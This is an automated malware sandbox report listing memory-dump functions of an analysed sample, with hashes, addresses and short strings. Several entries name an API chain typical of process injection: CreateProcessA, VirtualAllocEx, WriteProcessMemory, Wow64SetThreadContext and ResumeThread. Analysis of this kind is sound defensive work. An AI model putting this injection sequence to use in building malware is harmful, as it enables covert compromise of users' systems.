Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: 48l$48l
API String ID: 0-1341598364
Opcode ID: 8a0d8ea635193d72b14b39e44c86a37f22d424f0eca05fd84599c1fff2766a3f
Instruction ID: 3f9746ee916d6dc79504b2c5e5c839627ca083ae5f735af42db00fb4464437d3
Opcode Fuzzy Hash: 8a0d8ea635193d72b14b39e44c86a37f22d424f0eca05fd84599c1fff2766a3f
Instruction Fuzzy Hash: CE410630B20625CFCB088FA8C84567EB6F5FB45740F65443AE182DB792D7749D64CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00246008 Relevance: 2.6, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

48l, xrefs: 00246251
48l, xrefs: 0024625D

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: 48l$48l
API String ID: 0-1341598364
Opcode ID: 3bb4f497603dc6b2414da72582402f5114b4af7e183907def66b492fec0967bb
Instruction ID: 7eaf5f59e1517e292cc1c5168fde42319d6e27592902c6234fd6a38ac803d731
Opcode Fuzzy Hash: 3bb4f497603dc6b2414da72582402f5114b4af7e183907def66b492fec0967bb
Instruction Fuzzy Hash: AF41B234924611CBC7289F68CC486BAB7F1FF46301F189127E429CB265D3B4DD60C712

Uniqueness

Uniqueness Score: -1.00%

Function 048B7270 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 048B7537

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 580070ee706b80351d57ec1ea50d04d1b0464449f5b04cffe7e9c05b62ae76ed
Instruction ID: 5f182980d1b2369d840138fd677c59fa36e928c3c21d20a3b01d34919c5ce37d
Opcode Fuzzy Hash: 580070ee706b80351d57ec1ea50d04d1b0464449f5b04cffe7e9c05b62ae76ed
Instruction Fuzzy Hash: 0CC13770D0025D9FDB24DFA4C841BEDBBB1BF49304F0096A9E959B7240DB70AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00244638 Relevance: 1.7, Strings: 1, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

~, xrefs: 002441F9

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: d613b7affa92235f5fccd6ef8b067230e82796b8acf1f141c00dca4db69ff438
Instruction ID: b5d12a430d8bac290cee08743c075cc5d30b9c6cdadd7130575b57b23cd0280d
Opcode Fuzzy Hash: d613b7affa92235f5fccd6ef8b067230e82796b8acf1f141c00dca4db69ff438
Instruction Fuzzy Hash: 7622DF75A10218DFCB19DF58C984E98BBB2FF49314F1681D4EA09AB262C731EDA1DF50

Uniqueness

Uniqueness Score: -1.00%

Function 048B6E48 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 048B6F1B

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5659c8e5f256e33583ff3d4ccae0d3bed5fe6b8b7326bfa78c683db8f1098e59
Instruction ID: ac4ef32fc3f30d6c84dda33630907a9c0934c28dab4b5802bec1cd61988189a3
Opcode Fuzzy Hash: 5659c8e5f256e33583ff3d4ccae0d3bed5fe6b8b7326bfa78c683db8f1098e59
Instruction Fuzzy Hash: 6C41A9B4D012489FCF00CFA9D884AEEBBB1BB49314F20942AE815B7250D735AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 048B6FD0 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 048B708A

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7463d1896e683228b9987ea3bce3cbe38180d6cfcabaee5b9e3fe222bab0f3af
Instruction ID: 2f4e7d81c8dc0a40507ae9cc5acbc47fde61732e6b70be7dc7754734d6a0ec7d
Opcode Fuzzy Hash: 7463d1896e683228b9987ea3bce3cbe38180d6cfcabaee5b9e3fe222bab0f3af
Instruction Fuzzy Hash: DA41A8B4D042589FCF10CFA9D884AEEFBB1BF49314F10942AE815B7240D775AA46CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 048B6FD8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 048B708A

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 29ba6ead0c5b275da271ccc227aab1a6492b8c6611b12f2e10bb032c82f9da5f
Instruction ID: 344ddbfc7db6b44158c1c43fc1b798bffb0a59d1c672d72ccf0126c97294d559
Opcode Fuzzy Hash: 29ba6ead0c5b275da271ccc227aab1a6492b8c6611b12f2e10bb032c82f9da5f
Instruction Fuzzy Hash: D041A7B4D042589FCF10CFA9D884AEEFBB1BF49314F10942AE915B7240D735A946CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 048B6CF0 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 048B6D9A

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c3388e55f011d296cd9430364292f0b588efb626f23d15b145b6e1452ee1a1f5
Instruction ID: 9d43d71ed3b193f920dd8e01d99c293679727754627395c35675d916bc357a33
Opcode Fuzzy Hash: c3388e55f011d296cd9430364292f0b588efb626f23d15b145b6e1452ee1a1f5
Instruction Fuzzy Hash: FF4188B8D042589FCF10CFA9D884ADEBBB1FB49314F14942AE915B7300E735A916CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 048B6AF9 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 048B6BAF

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a02ad0b8e11c1ae0fa8ec2ed1ca908cb7dc77fa43e817f3f8d7c3fe347d6e425
Instruction ID: daaec339282ff24d5a396ff2db13a0b1a33af9f05372bf853e8070fc448f28d1
Opcode Fuzzy Hash: a02ad0b8e11c1ae0fa8ec2ed1ca908cb7dc77fa43e817f3f8d7c3fe347d6e425
Instruction Fuzzy Hash: 6741BFB4D042589FCB10CFA9D884AEEBBB1FF49314F14842AE415B7340D779A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 048B6B00 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 048B6BAF

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cd715d6a19ef28459d31b27ada3368190032568edcad9b6cde67db4fbfa38dce
Instruction ID: 2b52f00702084ec918ef5f9a76bb4f9be987bb639ab3eb39bbf0c2faba3ef6de
Opcode Fuzzy Hash: cd715d6a19ef28459d31b27ada3368190032568edcad9b6cde67db4fbfa38dce
Instruction Fuzzy Hash: 7341ACB4D002589FCB14CFA9D884AEEBBB1FF49314F14842AE415B7340E779A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 048B69D8 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 048B6A5E

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2658500bcad0fa5073535f88804a7644e98e5be0461b9023989f0598c0ecacec
Instruction ID: e867c7b11717bb30cf6f15ba9050b9622ca113e9c6a36f5e73324af6764e9058
Opcode Fuzzy Hash: 2658500bcad0fa5073535f88804a7644e98e5be0461b9023989f0598c0ecacec
Instruction Fuzzy Hash: BE31BBB4D012089FCF14CFA9E884AEEFBB5EF49214F14941AE815B7300D735A946CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 048B69E0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 048B6A5E

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ededf5c516cbd20a974808f634ac4cd5168f50d9a6f52203bbe5dbd736ced8e4
Instruction ID: 9404e0a60d395231661050a15b7f51e0837b0f0ca6bb8db3e3cb20e262315347
Opcode Fuzzy Hash: ededf5c516cbd20a974808f634ac4cd5168f50d9a6f52203bbe5dbd736ced8e4
Instruction Fuzzy Hash: A131A8B4D012189FCF14CFA9D884AAEFBB1EB49314F10942AE815B7300E735A942CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002462A7 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

48l, xrefs: 00246251

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: 48l
API String ID: 0-3926459034
Opcode ID: 7567d1a5bf88b6b898ef607f3faab1145cf3f5cc0d2f3f3abc0c6cf93ce1e89c
Instruction ID: d45d87c0b305d23afd5eea5da5aba0a903d33c09b4ca17da721307a38a80132b
Opcode Fuzzy Hash: 7567d1a5bf88b6b898ef607f3faab1145cf3f5cc0d2f3f3abc0c6cf93ce1e89c
Instruction Fuzzy Hash: AA510830A24611CBCB28CFA4D9482BAB7F1EF47701F14816BE96ADB291D3B48C64D716

Uniqueness

Uniqueness Score: -1.00%

Function 00240577 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

(Fl, xrefs: 00240701

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: c0337ef3472c2f5797159462a59911413c62fafadfdc9515e4f2230bdbe472d3
Instruction ID: 032c8045eb7769a07b09603a0272e335a47bf22640ebe39a4f25c9da53828bfe
Opcode Fuzzy Hash: c0337ef3472c2f5797159462a59911413c62fafadfdc9515e4f2230bdbe472d3
Instruction Fuzzy Hash: D4514AB8D0020E9FDF14CFA9D881AEEBBB1BF89300F10A569D412EB291DB309951CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00245E46 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

48l, xrefs: 00245E8A

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: 48l
API String ID: 0-3926459034
Opcode ID: 2c93b9e355467b824ca4a65267a316c61b265d62417ec41395d98ea7b3acfb14
Instruction ID: ad813a6ab76c9955781b2b85c3a9ff2a5087748eb095178c0f023ff1728ce672
Opcode Fuzzy Hash: 2c93b9e355467b824ca4a65267a316c61b265d62417ec41395d98ea7b3acfb14
Instruction Fuzzy Hash: 0B312630B20A26CFCB088FA8C8457BEB7F5FB45740F65443AE082D7692D7B49964CB52

Uniqueness

Uniqueness Score: -1.00%

Function 054C6569 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

`!l, xrefs: 054C65AB

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID: `!l
API String ID: 0-283557256
Opcode ID: 52f83e533f828d7fe318e60b5a2182e8df15c5eeab6777a70adea8bcb3fb399c
Instruction ID: 00bea38d1c2402ab5d7c55af94a20a00ee0cff92798cb2c134297119a4dcfc67
Opcode Fuzzy Hash: 52f83e533f828d7fe318e60b5a2182e8df15c5eeab6777a70adea8bcb3fb399c
Instruction Fuzzy Hash: A331D474E0021D9FDB05DFA9D9519EEBBB2EF88204F14802AE915A7760EB3459068F91

Uniqueness

Uniqueness Score: -1.00%

Function 054C6B59 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

B-z, xrefs: 054C6C16

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID: B-z
API String ID: 0-1806057957
Opcode ID: 1db3bf2f4436b3167ad55de3a7e6d67cb840ccc565edf501132530b9ea31011a
Instruction ID: 405a96e49bc2022f32e9085c0ef31a2145533f323747d1987662fd59db766da6
Opcode Fuzzy Hash: 1db3bf2f4436b3167ad55de3a7e6d67cb840ccc565edf501132530b9ea31011a
Instruction Fuzzy Hash: CE217A78E042198FCB48CFA9C8446EEBBB6EBC8300F15C5AAC409B3350DB344902CF90

Uniqueness

Uniqueness Score: -1.00%

Function 054C6B68 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

B-z, xrefs: 054C6C16

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID: B-z
API String ID: 0-1806057957
Opcode ID: 93c751c6c3340738a466dd477b9c43c15d868236ac3d5dca8cb4de1b565f2e08
Instruction ID: 47ac367f25f483a5b09b02e235fdacb21491eb38986220cc21bcb800186c70e2
Opcode Fuzzy Hash: 93c751c6c3340738a466dd477b9c43c15d868236ac3d5dca8cb4de1b565f2e08
Instruction Fuzzy Hash: B4212778E042198BCB48CFA9C8446EEBBBAEBC9300F05D56AD519B3354DB705942CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002418D6 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

(Fl, xrefs: 0024192F

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: df7127efa8ed617ccbe6d551d20e6d88e4f0e98aaa2747a666c10e11a30a17b6
Instruction ID: 0c729bc32cba2169f0e4358c10ebf769ac6980274235ff32e650415918dc5384
Opcode Fuzzy Hash: df7127efa8ed617ccbe6d551d20e6d88e4f0e98aaa2747a666c10e11a30a17b6
Instruction Fuzzy Hash: EA1190323604218FC768DB7DD85496973F5EF8976430584BAF50ACB771EB21DCA18B90

Uniqueness

Uniqueness Score: -1.00%

Function 002461C1 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

48l, xrefs: 00246251

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: 48l
API String ID: 0-3926459034
Opcode ID: 5343a20b3e16ff581eef87e8c7c22838e8b6f34f5f7be9f385001070f1193800
Instruction ID: f95fec1219f1cf7689da2576494a5eeb531384404207ba57f253851a82691835
Opcode Fuzzy Hash: 5343a20b3e16ff581eef87e8c7c22838e8b6f34f5f7be9f385001070f1193800
Instruction Fuzzy Hash: CA014931718200EFD7188BE49C19B6A36E5E78AB41F20043AF90ACB3C1DBF18C509382

Uniqueness

Uniqueness Score: -1.00%

Function 00243DF3 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

), xrefs: 00243E0B

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: a4d178b6a8ada5066165154d36bc427816e9aa734ecf271267d494a7e76b68fc
Instruction ID: abc1760552e61728b4ea63060a08e4353a3f62ae22555fe91f5c8343858643c7
Opcode Fuzzy Hash: a4d178b6a8ada5066165154d36bc427816e9aa734ecf271267d494a7e76b68fc
Instruction Fuzzy Hash: D1D02B3011A20CEFCF18DBB0D4086AD7B7CDF07305F140094940943911C7700EB4DA81

Uniqueness

Uniqueness Score: -1.00%

Function 00249B00 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

2, xrefs: 00249B13

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 8f37880f7f9ff44b02b0910598d36ce765bb5f7fd5d0054d2787f73768c4cead
Instruction ID: dd86bd35c1ded19ae7c82d0ed060e475d5b98cb8fd4267957bebcb2232421d74
Opcode Fuzzy Hash: 8f37880f7f9ff44b02b0910598d36ce765bb5f7fd5d0054d2787f73768c4cead
Instruction Fuzzy Hash: 8ED0A73056A108D6CA09EBE4E406A6B736CC702349F1014589809136528AB00EE0EE81

Uniqueness

Uniqueness Score: -1.00%

Function 00244D70 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 00244D83

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 5313e0e996321040cce2650aec99c782edbfc80bfc271f1dfd71c74d5ed76ac1
Instruction ID: 3614ab086f7184d1e551d80312d2a3a8986040ab06d256fe483fef655a5f3413
Opcode Fuzzy Hash: 5313e0e996321040cce2650aec99c782edbfc80bfc271f1dfd71c74d5ed76ac1
Instruction Fuzzy Hash: 3DD0A770869108E7C608FBE4D80577DB76C8702705F20048899095395186F00F649A85

Uniqueness

Uniqueness Score: -1.00%

Function 00243DF8 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

), xrefs: 00243E0B

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: f1a9bed67baa7dd20ff274dd2c38786884ff78b3fef461ed771778843f31ed31
Instruction ID: e7a41d7eedeef00f4f8a4ea3fcdb28b048aaf4b0ff5bdc8182ed9c87f11e31e3
Opcode Fuzzy Hash: f1a9bed67baa7dd20ff274dd2c38786884ff78b3fef461ed771778843f31ed31
Instruction Fuzzy Hash: A8D05E7021A208DBCA08DBA4D80866DB7AC9B06306F240044940A53651C7B00EB4EA95

Uniqueness

Uniqueness Score: -1.00%

Function 002437A0 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a3f7501dbb48cd952223a0a66620fcf3f72df386190cf8b94ad0c9361e655a
Instruction ID: ed5559290a38b11f468bbfcef95ce497ae9c29bbec64579c7baad000ee34cad3
Opcode Fuzzy Hash: f4a3f7501dbb48cd952223a0a66620fcf3f72df386190cf8b94ad0c9361e655a
Instruction Fuzzy Hash: ECF1C674A00218CFDBA4DF64C991BADB7B2EF89304F1080AAD91DA7755DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00244051 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2858f5b9fce9217414bfeaef36fa5a7f876dc477244ea47c85b0e8246b6d7261
Instruction ID: 6fd71cc37162c6801dc27f976b0952089155a1ac66cb349a45a9ed78f293b2c4
Opcode Fuzzy Hash: 2858f5b9fce9217414bfeaef36fa5a7f876dc477244ea47c85b0e8246b6d7261
Instruction Fuzzy Hash: 8EC1B275A10118DFDB19DF94C944E98BBB2FF09314F1680D5E609AB272C732E9A1EF50

Uniqueness

Uniqueness Score: -1.00%

Function 0024529E Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd1d6ada290e4e527bfe72a555c55e8f8e5eeec03ddf562ff49b29e7bd28dfc
Instruction ID: 26bdf53edc1a35c092aa5573a7065edce167ae93845dd3f80bb1adabb67d2be8
Opcode Fuzzy Hash: ebd1d6ada290e4e527bfe72a555c55e8f8e5eeec03ddf562ff49b29e7bd28dfc
Instruction Fuzzy Hash: 3981D474A10218CFDB54DFA8C980B9DBBF2FB49314F2481A9D959AB346D731AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00246E20 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba725099793af06a45246eceaa45b2e2994e9224b13a7e0eab572fa306d07107
Instruction ID: a64a785333d605970574fa15a7eef3446e79a6594bf3cfd07209b7234fafd466
Opcode Fuzzy Hash: ba725099793af06a45246eceaa45b2e2994e9224b13a7e0eab572fa306d07107
Instruction Fuzzy Hash: C451AC70A25619CFC708CF74C544ABEF7F2EF45700F558526E466AB292C774E890CB92

Uniqueness

Uniqueness Score: -1.00%

Function 002469D9 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84db1781b9626e2045270e215892127066d0c96e7d7575c6ff9fd36be8c00778
Instruction ID: 293c8ced99664a95003ac64b18acfee16606777319be02f4353f76fe8d2739ff
Opcode Fuzzy Hash: 84db1781b9626e2045270e215892127066d0c96e7d7575c6ff9fd36be8c00778
Instruction Fuzzy Hash: BF71E674A00229CFDB55CF58C880BAAB7B2FF49304F148595E919AB356CB31EE86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00245048 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f6405bfb218747b5021af0a8e4cd4ec926e51e46b01e9290b2bd15823afd4b
Instruction ID: bff8ff5aa8542c094877953a379ce57bf6d6b108e45bbb63f4d22fe908e48224
Opcode Fuzzy Hash: c9f6405bfb218747b5021af0a8e4cd4ec926e51e46b01e9290b2bd15823afd4b
Instruction Fuzzy Hash: 2C417078D25629EFCB04CFA8D9806EDBBF4AB0D300F206469E85AB3301E3719A519F54

Uniqueness

Uniqueness Score: -1.00%

Function 00245278 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0750a4d24eac7140185ccc10e42040adc284a38025ac316e1f8b1bc8bd4dbfa
Instruction ID: 11aeb0541324a6c71607600c8d6ab4f018c4ac90945a1dc0e33c0a36e9847b63
Opcode Fuzzy Hash: b0750a4d24eac7140185ccc10e42040adc284a38025ac316e1f8b1bc8bd4dbfa
Instruction Fuzzy Hash: A441D534A00218DFDB54DF68C951BA9B7B2FB89314F1480EAD90DAB345CB319E46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 054C0F1C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c5fe793667964a883cc9e5ec0ca00faa7587dcaf5c231c1a0041414260345e
Instruction ID: 2be0ba1a72ab255022aae6cccf615d519650c49babd7a559b5316625c95234a1
Opcode Fuzzy Hash: 93c5fe793667964a883cc9e5ec0ca00faa7587dcaf5c231c1a0041414260345e
Instruction Fuzzy Hash: 1641A47890A668CFDBA0DF25CC4C7EABBB2BB88301F1091DAD40DA6255D7715AC5CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00244A53 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489ad557911b5c9f240747d651dbed640a20f7362a3d796ac0f1d896fa90dfdc
Instruction ID: 912607aa5b5dcc55750fcbebc9260362f9716239ba4ac40ce3380c42447b5008
Opcode Fuzzy Hash: 489ad557911b5c9f240747d651dbed640a20f7362a3d796ac0f1d896fa90dfdc
Instruction Fuzzy Hash: D341CF78E10218DFDB54DF68C881B99BBB1FF49304F2480AAE919A7345DB319A86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002422B0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

